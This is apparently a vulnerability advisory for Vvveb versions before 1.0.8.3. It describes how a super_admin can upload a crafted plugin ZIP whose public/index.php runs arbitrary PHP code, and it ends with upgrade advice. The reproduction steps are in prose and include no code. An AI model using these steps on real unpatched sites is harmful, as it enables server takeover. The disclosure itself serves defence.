Vvveb Unrestricted File Upload Vulnerability Leading to Remote Code Execution

A vulnerability allowing unrestricted file uploads has been identified in Vvveb versions prior to 1.0.8.3. This issue resides in the plugin upload endpoint, where super_admin users can upload malicious plugin ZIP files that execute arbitrary PHP code. The exploitation involves crafting a ZIP file that includes a plugin.php file with a valid Slug header and a public/index.php file containing the PHP code. Once uploaded, the code executes as the web server user in response to unauthenticated HTTP requests directed to the plugin's public path.

Impact

Exploitation of this vulnerability allows for remote code execution on the server, with the executed code running as the web server user.

Reproduction

To reproduce this vulnerability, upload a ZIP file containing a crafted plugin.php file and a public/index.php file with arbitrary PHP code through the plugin upload endpoint. Ensure that the Slug header is valid. Once uploaded, the PHP code will execute when the public path of the plugin is accessed via an unauthenticated HTTP request.

Remediation

Users are advised to update to Vvveb version 1.0.8.3 or later, where this vulnerability has been addressed.